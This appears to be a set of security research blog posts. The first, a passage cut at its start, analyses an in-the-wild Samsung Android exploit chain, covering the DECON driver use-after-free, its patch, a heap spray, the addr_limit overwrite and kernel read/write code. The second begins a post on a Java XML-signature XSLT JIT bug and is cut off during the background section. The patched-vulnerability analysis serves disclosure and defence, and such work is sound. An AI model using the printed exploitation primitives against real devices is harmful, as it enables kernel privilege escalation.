Next the exploit needs to find the full file path for the DECON driver. The full file path can exist in a few different places on the filesystem so to find which one it is on this device, the exploit iterates through the /proc/<PID>/fd/ directory looking for any file path that contains “graphics/fb0”, the DECON driver. It uses readlink to find the file path for each /proc/<PID>/fd/<fd>. The semclipboard vulnerability (vulnerability #1) is then used to get the raw file descriptor for the DECON driver path.

Triggering the Use-After-Free

The vulnerability is in the decon_set_win_config function in the Samsung DECON driver. The vulnerability is a relatively common use-after-free pattern in kernel drivers. First, the driver acquires an fd for a fence. This fd is associated with a file pointer in a sync_file struct, specifically the file member. A “fence” is used for sharing buffers and synchronizing access between drivers and different processes.

/**

 * struct sync_file - sync file to export to the userspace

 * @file:               file representing this fence

 * @sync_file_list:     membership in global file list

 * @wq:                 wait queue for fence signaling

 * @fence:              fence with the fences in the sync_file

 * @cb:                 fence callback information

 */

struct sync_file {

        struct file             *file;

        /**

         * @user_name:

         *

         * Name of the sync file provided by userspace, for merged fences.

         * Otherwise generated through driver callbacks (in which case the

         * entire array is 0).

         */

        char                    user_name[32];

#ifdef CONFIG_DEBUG_FS

        struct list_head        sync_file_list;

#endif

        wait_queue_head_t       wq;

        unsigned long           flags;

        struct dma_fence        *fence;

        struct dma_fence_cb cb;

};

The driver then calls fd_install on the fd and file pointer, which makes the fd accessible from userspace and transfers ownership of the reference to the fd table. Userspace is able to call close on that fd. If that fd holds the only reference to the file struct, then the file struct is freed. However, the driver continues to use the pointer to that freed file struct.

static int decon_set_win_config(struct decon_device *decon,

                struct decon_win_config_data *win_data)

{

        int num_of_window = 0;

        struct decon_reg_data *regs;

        struct sync_file *sync_file;

        int i, j, ret = 0;

[...]

        num_of_window = decon_get_active_win_count(decon, win_data);

        if (num_of_window) {

                win_data->retire_fence = decon_create_fence(decon, &sync_file);

                if (win_data->retire_fence < 0)

                        goto err_prepare;

        } else {

[...]

        if (num_of_window) {

                fd_install(win_data->retire_fence, sync_file->file);

                decon_create_release_fences(decon, win_data, sync_file);

#if !defined(CONFIG_SUPPORT_LEGACY_FENCE)

                regs->retire_fence = dma_fence_get(sync_file->fence);

#endif

        }

[...]

        return ret;

}

In this case, decon_set_win_config acquires the fd for retire_fence in decon_create_fence.

int decon_create_fence(struct decon_device *decon, struct sync_file **sync_file)

{

        struct dma_fence *fence;

        int fd = -EMFILE;

        fence = kzalloc(sizeof(*fence), GFP_KERNEL);

        if (!fence)

                return -ENOMEM;

        dma_fence_init(fence, &decon_fence_ops, &decon->fence.lock,

                   decon->fence.context,

                   atomic_inc_return(&decon->fence.timeline));

        *sync_file = sync_file_create(fence);

        dma_fence_put(fence);

        if (!(*sync_file)) {

                decon_err("%s: failed to create sync file\n", __func__);

                return -ENOMEM;

        }

        fd = decon_get_valid_fd();

        if (fd < 0) {

                decon_err("%s: failed to get unused fd\n", __func__);

                fput((*sync_file)->file);

        }

        return fd;

}

The function then calls fd_install(win_data->retire_fence, sync_file->file) which means that userspace can now access the fd. When fd_install is called, another reference is not taken on the file so when userspace calls close(fd), the only reference on the file is dropped and the file struct is freed. The issue is that after calling fd_install the function then calls decon_create_release_fences(decon, win_data, sync_file) with the same sync_file that contains the pointer to the freed file struct. 

void decon_create_release_fences(struct decon_device *decon,

                struct decon_win_config_data *win_data,

                struct sync_file *sync_file)

{

        int i = 0;

        for (i = 0; i < decon->dt.max_win; i++) {

                int state = win_data->config[i].state;

                int rel_fence = -1;

                if (state == DECON_WIN_STATE_BUFFER) {

                        rel_fence = decon_get_valid_fd();

                        if (rel_fence < 0) {

                                decon_err("%s: failed to get unused fd\n",

                                                __func__);

                                goto err;

                        }

                        fd_install(rel_fence, get_file(sync_file->file));

                }

                win_data->config[i].rel_fence = rel_fence;

        }

        return;

err:

        while (i-- > 0) {

                if (win_data->config[i].state == DECON_WIN_STATE_BUFFER) {

                        put_unused_fd(win_data->config[i].rel_fence);

                        win_data->config[i].rel_fence = -1;

                }

        }

        return;

}

decon_create_release_fences gets a new fd, but then associates that new fd with the freed file struct, sync_file->file, in the call to fd_install.

When decon_set_win_config returns, retire_fence is the closed fd that points to the freed file struct and rel_fence is the open fd that points to the freed file struct.

Fixing the vulnerability

Samsung fixed this use-after-free in March 2021 as CVE-2021-25370. The fix was to move the call to fd_install in decon_set_win_config to the latest possible point in the function after the call to decon_create_release_fences.

        if (num_of_window) {

-               fd_install(win_data->retire_fence, sync_file->file);

                decon_create_release_fences(decon, win_data, sync_file);

#if !defined(CONFIG_SUPPORT_LEGACY_FENCE)

                regs->retire_fence = dma_fence_get(sync_file->fence);

#endif

        }

        decon_hiber_block(decon);

        mutex_lock(&decon->up.lock);

        list_add_tail(&regs->list, &decon->up.list);

+       atomic_inc(&decon->up.remaining_frame);

        decon->update_regs_list_cnt++;

+       win_data->extra.remained_frames = atomic_read(&decon->up.remaining_frame);

        mutex_unlock(&decon->up.lock);

        kthread_queue_work(&decon->up.worker, &decon->up.work);

+       /*

+        * The code is moved here because the DPU driver may get a wrong fd

+        * through the released file pointer,

+        * if the user(HWC) closes the fd and releases the file pointer.

+        *

+        * Since the user land can use fd from this point/time,

+        * it can be guaranteed to use an unreleased file pointer

+        * when creating a rel_fence in decon_create_release_fences(...)

+        */

+       if (num_of_window)

+               fd_install(win_data->retire_fence, sync_file->file);

        mutex_unlock(&decon->lock);

Heap Grooming and Spray

To groom the heap the exploit first opens and closes 30,000+ files using memfd_create. Then, the exploit sprays the heap with fake file structs. On this version of the Samsung kernel, the file struct is 0x140 bytes. In these new, fake file structs, the exploit sets four of the members:

fake_file.f_u = 0x1010101;

fake_file.f_op = kaddr - 0x2071B0+0x1094E80;

fake_file.f_count = 0x7F;

fake_file.private_data = addr_limit_ptr;

The f_op member is set to the signalfd_op for reasons we will cover below in the “Overwriting the addr_limit” section. kaddr is the address leaked using vulnerability #2 described previously. The addr_limit_ptr was calculated by adding 8 to the task_struct address also leaked using vulnerability #2.

The exploit sprays 25 of these structs across the heap using the MEM_PROFILE_ADD ioctl in the Mali driver.

/**

 * struct kbase_ioctl_mem_profile_add - Provide profiling information to kernel

 * @buffer: Pointer to the information

 * @len: Length

 * @padding: Padding

 *

 * The data provided is accessible through a debugfs file

 */

struct kbase_ioctl_mem_profile_add {

        __u64 buffer;

        __u32 len;

        __u32 padding;

};

#define KBASE_ioctl_MEM_PROFILE_ADD \

        _IOW(KBASE_ioctl_TYPE, 27, struct kbase_ioctl_mem_profile_add)

static int kbase_api_mem_profile_add(struct kbase_context *kctx,

                struct kbase_ioctl_mem_profile_add *data)

{

        char *buf;

        int err;

        if (data->len > KBASE_MEM_PROFILE_MAX_BUF_SIZE) {

                dev_err(kctx->kbdev->dev, "mem_profile_add: buffer too big\n");

                return -EINVAL;

        }

        buf = kmalloc(data->len, GFP_KERNEL);

        if (ZERO_OR_NULL_PTR(buf))

                return -ENOMEM;

        err = copy_from_user(buf, u64_to_user_ptr(data->buffer),

                        data->len);

        if (err) {

                kfree(buf);

                return -EFAULT;

        }

        return kbasep_mem_profile_debugfs_insert(kctx, buf, data->len);

}

This ioctl takes a pointer to a buffer, the length of the buffer, and padding as arguments. kbase_api_mem_profile_add will allocate a buffer on the kernel heap and then will copy the passed buffer from userspace into the newly allocated kernel buffer.

Finally, kbase_api_mem_profile_add calls kbasep_mem_profile_debugfs_insert. This technique only works when the device is running a kernel with CONFIG_DEBUG_FS enabled. The purpose of the MEM_PROFILE_ADD ioctl is to write a buffer to DebugFS. As of Android 11, DebugFS should not be enabled on production devices. Whenever Android launches new requirements like this, it only applies to devices launched on that new version of Android. Android 11 launched in September 2020 and the exploit was found in November 2020 so it makes sense that the exploit targeted devices Android 10 and before where DebugFS would have been mounted.

Screenshot of the DebugFS section from https://source.android.com/docs/setup/about/android-11-release#debugfs.  The highlighted text reads: &quot;Android 11 removes platform support for DebugFS and requires that it not be mounted or accessed on production devices&quot;

For example, on the A51 exynos device (SM-A515F) which launched on Android 10, both CONFIG_DEBUG_FS is enabled and DebugFS is mounted.

a51:/ $ getprop ro.build.fingerprint

samsung/a51nnxx/a51:11/RP1A.200720.012/A515FXXU4DUB1:user/release-keys

a51:/ $ getprop ro.build.version.security_patch

2021-02-01

a51:/ $ uname -a

Linux localhost 4.14.113-20899478 #1 SMP PREEMPT Mon Feb 1 15:37:03 KST 2021 aarch64

a51:/ $ cat /proc/config.gz | gunzip | cat | grep CONFIG_DEBUG_FS                                                                          

CONFIG_DEBUG_FS=y

a51:/ $ cat /proc/mounts | grep debug                                                                                                      

/sys/kernel/debug /sys/kernel/debug debugfs rw,seclabel,relatime 0 0

Because DebugFS is mounted, the exploit is able to use the MEM_PROFILE_ADD ioctl to groom the heap. If DebugFS wasn’t enabled or mounted, kbasep_mem_profile_debugfs_insert would simply free the newly allocated kernel buffer and return.

#ifdef CONFIG_DEBUG_FS

int kbasep_mem_profile_debugfs_insert(struct kbase_context *kctx, char *data,

                                        size_t size)

{

        int err = 0;

        mutex_lock(&kctx->mem_profile_lock);

        dev_dbg(kctx->kbdev->dev, "initialised: %d",

                kbase_ctx_flag(kctx, KCTX_MEM_PROFILE_INITIALIZED));

        if (!kbase_ctx_flag(kctx, KCTX_MEM_PROFILE_INITIALIZED)) {

                if (IS_ERR_OR_NULL(kctx->kctx_dentry)) {

                        err  = -ENOMEM;

                } else if (!debugfs_create_file("mem_profile", 0444,

                                        kctx->kctx_dentry, kctx,

                                        &kbasep_mem_profile_debugfs_fops)) {

                        err = -EAGAIN;

                } else {

                        kbase_ctx_flag_set(kctx,

                                           KCTX_MEM_PROFILE_INITIALIZED);

                }

        }

        if (kbase_ctx_flag(kctx, KCTX_MEM_PROFILE_INITIALIZED)) {

                kfree(kctx->mem_profile_data);

                kctx->mem_profile_data = data;

                kctx->mem_profile_size = size;

        } else {

                kfree(data);

        }

        dev_dbg(kctx->kbdev->dev, "returning: %d, initialised: %d",

                err, kbase_ctx_flag(kctx, KCTX_MEM_PROFILE_INITIALIZED));

        mutex_unlock(&kctx->mem_profile_lock);

        return err;

}

#else /* CONFIG_DEBUG_FS */

int kbasep_mem_profile_debugfs_insert(struct kbase_context *kctx, char *data,

                                        size_t size)

{

        kfree(data);

        return 0;

}

#endif /* CONFIG_DEBUG_FS */

By writing the fake file structs as a singular 0x2000 size buffer rather than as 25 individual 0x140 size buffers, the exploit will be writing their fake structs to two whole pages which increases the odds of reallocating over the freed file struct.

The exploit then calls dup2 on the dangling FD’s. The dup2 syscall will open another fd on the same open file structure that the original points to. In this case, the exploit is calling dup2 to verify that they successfully reallocated a fake file structure in the same place as the freed file structure. dup2 will increment the reference count (f_count) in the file structure. In all of our fake file structures, the f_count was set to 0x7F. So if any of them are incremented to 0x80, the exploit knows that it successfully reallocated over the freed file struct.

To determine if any of the file struct’s refcounts were incremented, the exploit iterates through each of the directories under /sys/kernel/debug/mali/mem/ and reads each directory’s mem_profile contents. If it finds the byte 0x80, then it knows that it successfully reallocated the freed struct and that the f_count of the fake file struct was incremented.

Overwriting the addr_limit

Like many previous Android exploits, to gain arbitrary kernel read and write, the exploit overwrites the kernel address limit (addr_limit). The addr_limit defines the address range that the kernel may access when dereferencing userspace pointers. For userspace threads, the addr_limit is usually USER_DS or 0x7FFFFFFFFF. For kernel threads, it’s usually KERNEL_DS or 0xFFFFFFFFFFFFFFFF.  

Userspace operations only access addresses below the addr_limit. Therefore, by raising the addr_limit by overwriting it, we will make kernel memory accessible to our unprivileged process. The exploit uses the syscall signalfd with the dangling fd to do this.

signalfd(dangling_fd, 0xFFFFFF8000000000, 8);

According to the man pages, the syscall signalfd is:

signalfd() creates a file descriptor that can be used to accept signals targeted at the caller.  This provides an alternative to the use of a signal handler or sigwaitinfo(2), and has the advantage that the file descriptor may be monitored by select(2), poll(2), and epoll(7).

int signalfd(int fd, const sigset_t *mask, int flags);

The exploit called signalfd on the file descriptor that was found to replace the freed one in the previous step. When signalfd is called on an existing file descriptor, only the mask is updated based on the mask passed as the argument, which gives the exploit an 8-byte write to the signmask of the signalfd_ctx struct..

typedef unsigned long sigset_t;

struct signalfd_ctx {

        sigset_t sigmask;

};

The file struct includes a field called private_data that is a void *. File structs for signalfd file descriptors store the pointer to the signalfd_ctx struct in the private_data field. As shown above, the signalfd_ctx struct is simply an 8 byte structure that contains the mask.

Let’s walk through how the signalfd source code updates the mask:

SYSCALL_DEFINE4(signalfd4, int, ufd, sigset_t __user *, user_mask,

                size_t, sizemask, int, flags)

{

        sigset_t sigmask;

        struct signalfd_ctx *ctx;

        /* Check the SFD_* constants for consistency.  */

        BUILD_BUG_ON(SFD_CLOEXEC != O_CLOEXEC);

        BUILD_BUG_ON(SFD_NONBLOCK != O_NONBLOCK);

        if (flags & ~(SFD_CLOEXEC | SFD_NONBLOCK))

                return -EINVAL;

        if (sizemask != sizeof(sigset_t) ||

            copy_from_user(&sigmask, user_mask, sizeof(sigmask)))

               return -EINVAL;

        sigdelsetmask(&sigmask, sigmask(SIGKILL) | sigmask(SIGSTOP));

        signotset(&sigmask);                                      // [1]

        if (ufd == -1) {                                          // [2]

                ctx = kmalloc(sizeof(*ctx), GFP_KERNEL);

                if (!ctx)

                        return -ENOMEM;

                ctx->sigmask = sigmask;

                /*

                 * When we call this, the initialization must be complete, since

                 * anon_inode_getfd() will install the fd.

                 */

                ufd = anon_inode_getfd("[signalfd]", &signalfd_fops, ctx,

                                       O_RDWR | (flags & (O_CLOEXEC | O_NONBLOCK)));

                if (ufd < 0)

                        kfree(ctx);

        } else {                                                 // [3]

                struct fd f = fdget(ufd);

                if (!f.file)

                        return -EBADF;

                ctx = f.file->private_data;                      // [4]

                if (f.file->f_op != &signalfd_fops) {            // [5]

                        fdput(f);

                        return -EINVAL;

                }

                spin_lock_irq(&current->sighand->siglock);

                ctx->sigmask = sigmask;                         // [6] WRITE!

                spin_unlock_irq(&current->sighand->siglock);

                wake_up(&current->sighand->signalfd_wqh);

                fdput(f);

        }

        return ufd;

}

First the function modifies the mask that was passed in. The mask passed into the function is the signals that should be accepted via the file descriptor, but the sigmask member of the signalfd struct represents the signals that should be blocked. The sigdelsetmask and signotset calls at [1] makes this change. The call to sigdelsetmask ensures that the SIG_KILL and SIG_STOP signals are always blocked so it clears bit 8 (SIG_KILL) and bit 18 (SIG_STOP) in order for them to be set in the next call. Then signotset flips each bit in the mask. The mask that is written is ~(mask_in_arg & 0xFFFFFFFFFFFBFEFF).

The function checks whether or not the file descriptor passed in is -1 at [2]. In this exploit’s case it’s not so we fall into the else block at [3]. At [4] the signalfd_ctx* is set to the private_data pointer.

The signalfd manual page also says that the fd argument “must specify a valid existing signalfd file descriptor”. To verify this, at [5] the syscall checks if the underlying file’s f_op equals the signalfd_ops. This is why the f_op was set to signalfd_ops in the previous section. Finally at [6], the overwrite occurs. The user provided mask is written to the address in private_data. In the exploit’s case, the fake file struct’s private_data was set to the addr_limit pointer. So when the mask is written, we’re actually overwriting the addr_limit.

The exploit calls signalfd with a mask argument of 0xFFFFFF8000000000. So the value ~(0xFFFFFF8000000000 & 0xFFFFFFFFFFFCFEFF) = 0x7FFFFFFFFF, also known as USER_DS. We’ll talk about why they’re overwriting the addr_limit as USER_DS rather than KERNEL_DS in the next section.

Working Around UAO and PAN

“User-Access Override” (UAO) and “Privileged Access Never” (PAN) are two exploit mitigations that are commonly found on modern Android devices. Their kernel configs are CONFIG_ARM64_UAO and CONFIG_ARM64_PAN. Both PAN and UAO are hardware mitigations released on ARMv8 CPUs. PAN protects against the kernel directly accessing user-space memory. UAO works with PAN by allowing unprivileged load and store instructions to act as privileged load and store instructions when the UAO bit is set.

It’s often said that the addr_limit overwrite technique detailed above doesn’t work on devices with UAO and PAN turned on. The commonly used addr_limit overwrite technique was to change the addr_limit to a very high address, like 0xFFFFFFFFFFFFFFFF (KERNEL_DS), and then use a pair of pipes for arbitrary kernel read and write. This is what Jann and I did in our proof-of-concept for CVE-2019-2215 back in 2019. Our kernel_write function is shown below.

void kernel_write(unsigned long kaddr, void *buf, unsigned long len) {

  errno = 0;

  if (len > 0x1000) errx(1, "kernel writes over PAGE_SIZE are messy, tried 0x%lx", len);

  if (write(kernel_rw_pipe[1], buf, len) != len) err(1, "kernel_write failed to load userspace buffer");

  if (read(kernel_rw_pipe[0], (void*)kaddr, len) != len) err(1, "kernel_write failed to overwrite kernel memory");

}

This technique works by first writing the pointer to the buffer of the contents that you’d like written to one end of the pipe. By then calling a read and passing in the kernel address you’d like to write to, those contents are then written to that kernel memory address.

With UAO and PAN enabled, if the addr_limit is set to KERNEL_DS and we attempt to execute this function, the first write call will fail because buf is in user-space memory and PAN prevents the kernel from accessing user space memory.

Let’s say we didn’t set the addr_limit to KERNEL_DS (-1) and instead set it to -2, a high kernel address that’s not KERNEL_DS. PAN wouldn’t be enabled, but neither would UAO. Without UAO enabled, the unprivileged load and store instructions are not able to access the kernel memory.

The way the exploit works around the constraints of UAO and PAN is pretty straightforward: the exploit switches the addr_limit between USER_DS and KERNEL_DS based on whether it needs to access user space or kernel space memory. As shown in the uao_thread_switch function below, UAO is enabled when addr_limit == KERNEL_DS and is disabled when it does not.

/* Restore the UAO state depending on next's addr_limit */

void uao_thread_switch(struct task_struct *next)

{

        if (IS_ENABLED(CONFIG_ARM64_UAO)) {

                if (task_thread_info(next)->addr_limit == KERNEL_DS)

                        asm(ALTERNATIVE("nop", SET_PSTATE_UAO(1), ARM64_HAS_UAO));

                else

                        asm(ALTERNATIVE("nop", SET_PSTATE_UAO(0), ARM64_HAS_UAO));

        }

}

The exploit was able to use this technique of toggling the addr_limit between USER_DS and KERNEL_DS because they had such a good primitive from the use-after-free and could reliably and repeatedly write a new value to the addr_limit by calling signalfd. The exploit’s function to write to kernel addresses is shown below:

kernel_write(void *kaddr, const void *buf, unsigned long buf_len)

{

  unsigned long USER_DS = 0x7FFFFFFFFF;

  write(kernel_rw_pipe2, buf, buf_len);                   // [1]

  write(kernel_rw_pipe2, &USER_DS, 8u);                   // [2]

  set_addr_limit_to_KERNEL_DS();                          // [3]            

  read(kernel_rw_pipe, kaddr, buf_len);                   // [4]

  read(kernel_rw_pipe, addr_limit_ptr, 8u);               // [5]

}

The function takes three arguments: the kernel address to write to (kaddr), a pointer to the buffer of contents to write (buf), and the length of the buffer (buf_len). buf is in userspace. When the kernel_write function is entered, the addr_limit is currently set to USER_DS. At [1] the exploit writes the buffer pointer to the pipe. A pointer to the USER_DS value is written to the pipe at [2].

The set_addr_limit_to_KERNEL_DS function at [3] sends a signal to tell another process in the exploit to call signalfd with a mask of 0. Because signalfd performs a NOT on the bits provided in the mask in signotset, the value 0xFFFFFFFFFFFFFFFF (KERNEL_DS) is written to the addr_limit.

Now that the addr_limit is set to KERNEL_DS the exploit can access kernel memory. At [4], the exploit reads from the pipe, writing the contents to kaddr. Then at [5] the exploit returns addr_limit back to USER_DS by reading the value from the pipe that was written at [2] and writing it back to the addr_limit. The exploit’s function to read from kernel memory is the mirror image of this function.

I deliberately am not calling this a bypass because UAO and PAN are acting exactly as they were designed to act: preventing the kernel from accessing user-space memory. UAO and PAN were not developed to protect against arbitrary write access to the addr_limit.

Post-exploitation

The exploit now has arbitrary kernel read and write. It then follows the steps as seen in most other Android exploits: overwrite the cred struct for the current process and overwrite the loaded SELinux policy to change the current process’s context to vold. vold is the “Volume Daemon” which is responsible for mounting and unmounting of external storage. vold runs as root and while it's a userspace service, it’s considered kernel-equivalent as described in the Android documentation on security contexts. Because it’s a highly privileged security context, it makes a prime target for changing the SELinux context to.

Screen shot of the &quot;OS Kernel&quot; section from https://source.android.com/docs/security/overview/updates-resources#process_types. It says:  Functionality that: - is part of the kernel - runs in the same CPU context as the kernel (for example, device drivers) - has direct access to kernel memory (for example, hardware components on the device) - has the capability to load scripts into a kernel component (for example, eBPF) - is one of a handful of user services that's considered kernel equivalent (such as, apexd, bpfloader, init, ueventd, and vold).

As stated at the beginning of this post, the sample obtained was discovered in the preparatory stages of the attack. Unfortunately, it did not include the final payload that would have been deployed with this exploit.

Conclusion

This in-the-wild exploit chain is a great example of different attack surfaces and “shape” than many of the Android exploits we’ve seen in the past. All three vulnerabilities in this chain were in the manufacturer’s custom components rather than in the AOSP platform or the Linux kernel. It’s also interesting to note that 2 out of the 3 vulnerabilities were logic and design vulnerabilities rather than memory safety. Of the 10 other Android in-the-wild 0-days that we’ve tracked since mid-2014, only 2 of those were not memory corruption vulnerabilities.

The first vulnerability in this chain, the arbitrary file read and write, CVE-2021-25337, was the foundation of this chain, used 4 different times and used at least once in each step. The vulnerability was in the Java code of a custom content provider in the system_server. The Java components in Android devices don’t tend to be the most popular targets for security researchers despite it running at such a privileged level. This highlights an area for further research.

Labeling when vulnerabilities are known to be exploited in-the-wild is important both for targeted users and for the security industry. When in-the-wild 0-days are not transparently disclosed, we are not able to use that information to further protect users, using patch analysis and variant analysis, to gain an understanding of what attackers already know.

The analysis of this exploit chain has provided us with new and important insights into how attackers are targeting Android devices. It highlights a need for more research into manufacturer specific components. It shows where we ought to do further variant analysis. It is a good example of how Android exploits can take many different “shapes” and so brainstorming different detection ideas is a worthwhile exercise. But in this case, we’re at least 18 months behind the attackers: they already know which bugs they’re exploiting and so when this information is not shared transparently, it leaves defenders at a further disadvantage.

This transparent disclosure of in-the-wild status is necessary for both the safety and autonomy of targeted users to protect themselves as well as the security industry to work together to best prevent these 0-days in the future.

Gregor Samsa: Exploiting Java's XML Signature Verification

2 November 2022 at 11:41

By Felix Wilhelm, Project Zero


Earlier this year, I discovered a surprising attack surface hidden deep inside Java’s standard library: A custom JIT compiler processing untrusted XSLT programs, exposed to remote attackers during XML signature verification. This post discusses CVE-2022-34169, an integer truncation bug in this JIT compiler resulting in arbitrary code execution in many Java-based web applications and identity providers that support the SAML single-sign-on standard. 

OpenJDK fixed the discussed issue in July 2022. The Apache BCEL project used by Xalan-J, the origin of the vulnerable code, released a patch in September 2022


While the vulnerability discussed in this post has been patched , vendors and users should expect further vulnerabilities in SAML.


From a security researcher's perspective, this vulnerability is an example of an integer truncation issue in a memory-safe language, with an exploit that feels very much like a memory corruption. While less common than the typical memory safety issues of C or C++ codebases, weird machines still exist in memory safe languages and will keep us busy even after we move into a bright memory safe future.


Before diving into the vulnerability and its exploit, I’m going to give a quick overview of XML signatures and SAML. What makes XML signatures such an interesting target and why should we care about them?

Introduction


XML Signatures are a typical example of a security protocol invented in the early 2000’s. They suffer from high complexity, a large attack surface and a wealth of configurable features that can weaken or break its security guarantees in surprising ways. Modern usage of XML signatures is mostly restricted to somewhat obscure protocols and legacy applications, but there is one important exception: SAML. SAML, which stands for Security Assertion Markup Language, is one of the two main Single-Sign-On standards used in modern web applications. While its alternative, the OAuth based OpenID Connect (OIDC) is gaining popularity, SAML is still the de-facto standard for large enterprises and complex integrations. 


SAML relies on XML signatures to protect messages forwarded through the browser. This turns XML signature verification into a very interesting external attack surface for attacking modern multi-tenant SaaS applications. While you don’t need a detailed understanding of SAML to follow this post, interested readers can take a look at Okta's Understanding SAML writeup or the SAML 2.0 wiki entry to get a better understanding of the protocol.


SAML SSO logins work by exchanging XML documents between the application, known as service provider (SP), and the identity provider (IdP). When a user tries to login to an SP, the service provider creates a SAML request. The IdP looks at the SAML request, tries to authenticate the user and sends a SAML response back to the SP. A successful response will contain information about the user, which the application can then use to grant access to its resources. 


In the most widely used SAML flow (known as SP Redirect Bind / IdP POST Response) these documents are forwarded through the user's browser using HTTP redirects and POST requests. To protect against modification by the user, the security critical part of the SAML response (known as Assertion) has to be cryptographically signed by the IdP. In addition, the IdP might require SPs to also sign the SAML request to protect against impersonation attacks.

This means that both the IdP and the SP have to parse and verify XML signatures passed to them by a potential malicious actor. Why is this a problem? Let's take a closer look at the way XML signatures work:


XML Signatures


Most signature schemes operate on a raw byte stream and sign the data as seen on the wire. Instead, the XML signature standard (known as XMLDsig) tries to be robust against insignificant changes to the signed XML document. This means that changing whitespaces, line endings or comments in a signed document should not invalidate its signature. 


An XML signature consists of a special Signature element, an example of which is shown below:

<Signature>

  <SignedInfo>

    <CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>

    <SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1" />

    <Reference URI="#signed-data">

       <Transforms>

       …

       </Transforms>

       <DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1" />

       <DigestValue>9bc34549d565d9505b287de0cd20ac77be1d3f2c</DigestValue>

    </Reference>

  </SignedInfo>

  <SignatureValue>....</SignatureValue>

  <KeyInfo><X509Certificate>....</X509Certificate></KeyInfo>

</Signature>


  • The  SignedInfo child contains  CanonicalizationMethod and SignatureMethod elements as well as one or more Reference elements describing the integrity protected data. 

  • KeyInfo describes the signer key and can contain a raw public key, a X509 certificate or just a key id. 

  • SignatureValue contains the cryptographic signature (using SignatureMethod) of the SignedInfo element after it has been canonicalized using CanonicalizationMethod


At this point, only the integrity of the SignedInfo element is protected. To understand how this protection is extended to the actual data, we need to take a look at the way Reference elements work: In theory the Reference URI attribute can either point to an external document (detached signature), an element embedded as a child (enveloping signature) or any element in the outer document (enveloped signature). In practice, most SAML implementations use enveloped signatures and the Reference URI will point to the signed element somewhere in the current document tree.


When a Reference is processed during verification or signing, the referenced content is passed through a chain of Transforms. XMLDsig supports a number of transforms ranging from canonicalization, over base64 decoding to XPath or even XSLT. Once all transforms have been processed the resulting byte stream is passed into the cryptographic hash function specified with the DigestMethod element and the result is stored in DigestValue

This way, as the whole Reference element is part of SignedInfo, its integrity protection gets extended to the referenced element as well. 


Validating a XML signature can therefore be split into two separate steps:

  • Reference Validation: Iterate through all embedded references and for each reference fetch the referenced data, pump it through the Transforms chain and calculate its hash digest. Compare the calculated Digest with the stored DigestValue and fail if they differ.

  • Signature Validation: First canonicalize the SignedInfo element using the specified CanonicalizationMethod algorithm. Calculate the signature of SignedInfo using the algorithm specified in SignatureMethod and the signer key described in KeyInfo. Compare the result with SignatureValue and fail if they differ.


Interestingly, the order of these two steps can be implementation specific. While the XMLDsig RFC lists Reference Validation as the first step, performing Signature Validation first can have security advantages as we will see later on.


Correctly validating XML signatures and making sure the data we care about is protected, is very difficult in the context of SAML. This will be a topic for later blog posts, but at this point we want to focus on the reference validation step:


As part of this step, the application verifying a signature has to run attacker controlled transforms on attacker controlled input. Looking at the list of transformations supported by XMLDsig, one seems particularly interesting: XSLT. 


XSLT, which stands for Extensible Stylesheet Language Transformations, is a feature-rich XML based programming language designed for transforming XML documents. Embedding a XSLT transform in a XML signature means that the verifier has to run the XSLT program on the referenced XML data. 


The code snippet below gives you an example of a simple XSLT transformation. When executed it fetches each <data> element stored inside <input>, grabs the first character of its content and returns it as part of its <output>. So <input><data>abc</data><data>def</data></input> would be transformed into <output><data>a</data><data>d</data></output>

<Transform Algorithm="http://www.w3.org/TR/1999/REC-xslt-19991116">

  <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"

   xmlns="http://www.w3.org/TR/xhtml1/strict" exclude-result-prefixes="foo"   

   version="1.0">

   <xsl:output encoding="UTF-8" indent="no" method="xml" />

   <xsl:template match="/input">

                    <output>

                          <xsl:for-each select="data">

                              <data><xsl:value-of select="substring(.,1,1)" /></data>

                          </xsl:for-each>

                    </output>

  </xsl:template>

 </xsl:stylesheet>

</Transform>


Exposing a fully-featured language runtime to an external attacker seems like a bad idea, so let's take a look at how this feature is implemented in Java’s OpenJDK.


XSLT in Java


Java’s main interface for working with XML signatures is the java.xml.crypto.XMLSignature class and its sign and validate methods. We are mostly interested in the validate method which is shown below:


// https://github.com/openjdk/jdk/blob/master/src/java.xml.crypto/share/classes/org/jcp/xml/dsig/internal/dom/DOMXMLSignature.java

@Override

    public boolean validate(XMLValidateContext vc)

        throws XMLSignatureException

    {

        [..]

        // validate the signature

        boolean sigValidity = sv.validate(vc); (A)

        if (!sigValidity) {

            validationStatus = false;

            validated = true;

            return validationStatus;

        }


        // validate all References

        @SuppressWarnings("unchecked")

        List<Reference> refs = this.si.getReferences();

        boolean validateRefs = true;

        for (int i = 0, size = refs.size(); validateRefs && i < size; i++) {

            Reference ref = refs.get(i);

            boolean refValid = ref.validate(vc); (B)

            LOG.debug("Reference [{}] is valid: {}", ref.getURI(), refValid);

            validateRefs &= refValid;

        }

        if (!validateRefs) {

            LOG.debug("Couldn't validate the References");

            validationStatus = false;

            validated = true;

            return validationStatus;

        } 

   [..]

   }


As we can see, the validate method first validates the signature of the SignedInfo element in (A) before validating all the references in (B).  This means that an attack against the XSLT runtime will require a valid signature for the SignedInfo element and we’ll discuss later how an attacker can bypass this requirement.


The call to ref.validate() in (B) ends up in the DomReference.validate method shown below:

public boolean validate(XMLValidateContext validateContext)

        throws XMLSignatureException

    {

        if (validateContext == null) {

            throw new NullPointerException("validateContext cannot be null");

        }

        if (validated) {

            return validationStatus;

        }

        Data data = dereference(validateContext); (D)

        calcDigestValue = transform(data, validateContext); (E)


        [..]

        validationStatus = Arrays.equals(digestValue, calcDigestValue); (F)

        validated = true;

        return validationStatus;

    }




The code gets the referenced data in (D), transforms it in (E) and compares the digest of the result with the digest stored in the signature in (F). Most of the complexity is hidden behind the call to transform in (E) which loops through all Transform elements defined in the Reference and executes them.


As this is Java, we have to walk through a lot of indirection layers before we end up at the interesting parts. Take a look at the call stack below if you want to follow along and step through the code:


